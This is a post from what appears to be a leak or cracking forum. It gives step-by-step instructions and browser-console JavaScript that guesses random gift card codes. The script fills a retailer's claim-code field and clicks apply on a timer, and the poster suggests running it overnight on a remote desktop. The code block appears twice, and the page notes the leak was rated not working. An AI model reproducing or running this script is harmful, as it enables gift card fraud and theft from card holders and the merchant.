DankoFR
Divine
Divine
Contributor
Elite member
Premium
- Thread Author
- #2
Don't have an account? No worries! Click me to register so you could reply to this thread! (And view its content)
Register Today
Like the Thread for More Leaks!
[HIDE]
Steps:[/HIDE]
Register Today
Like the Thread for More Leaks!
[HIDE]
Steps:[/HIDE]
- 1. Login into your account
- 2. Add any item to the cart (Value doesn't matter)
- 3.Proceed to the payout page (Do not order it though
- 4. Press on add/use gift card button
- 5. Open the console of the navigator and paste the code below
- 6. Select 2,000 if your PC could handle a lot of threading, if not, select 3,000 (Better do it on an RDP so you could leave it running overnight
Code:
var speed = prompt("Type 2,000 if your PC is fast, 3000 for a slow pc");
function Letter() {
var code = "";
var chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
for (var i = 0; i < 1; i++)
code +=
chars.charAt(Math.floor(Math.random() * chars.length));
return code;
}
function Number() {
var code = "";
var chars = "0123456789";
for (var i = 0; i < 1; i++)
code +=
chars.charAt(Math.floor(Math.random() * chars.length));
return code;
}
function Random() {
var code = "";
var chars = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";
for (var i = 0; i < 1; i++)
code +=
chars.charAt(Math.floor(Math.random() * chars.length));
return code;
}
function main() {
document.getElementsByName("ppw-claimCode")[0].value =
Letter() +Letter() +Letter() +Letter() +"-" +
Letter() +Letter() +Letter() +Letter() +Letter() +Letter() +"-" +
Letter() +Letter() +Letter() +Random();
//EDIT THIS TOP LINE FOR A CUSTOM PATTERN BY REPLACING Random() FOR Letter() OR Number()
document.getElementsByName("ppw-claimCodeApplyPressed")[0].click();
}
setInterval(function () {
main();
}, speed);
function Letter() {
var code = "";
var chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
for (var i = 0; i < 1; i++)
code +=
chars.charAt(Math.floor(Math.random() * chars.length));
return code;
}
function Number() {
var code = "";
var chars = "0123456789";
for (var i = 0; i < 1; i++)
code +=
chars.charAt(Math.floor(Math.random() * chars.length));
return code;
}
function Random() {
var code = "";
var chars = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";
for (var i = 0; i < 1; i++)
code +=
chars.charAt(Math.floor(Math.random() * chars.length));
return code;
}
function main() {
document.getElementsByName("ppw-claimCode")[0].value =
Letter() +Letter() +Letter() +Letter() +"-" +
Letter() +Letter() +Letter() +Letter() +Letter() +Letter() +"-" +
Letter() +Letter() +Letter() +Random();
//EDIT THIS TOP LINE FOR A CUSTOM PATTERN BY REPLACING Random() FOR Letter() OR Number()
document.getElementsByName("ppw-claimCodeApplyPressed")[0].click();
}
setInterval(function () {
main();
}, speed);
This leak has been rated as not working 1 times this month. (2 times in total)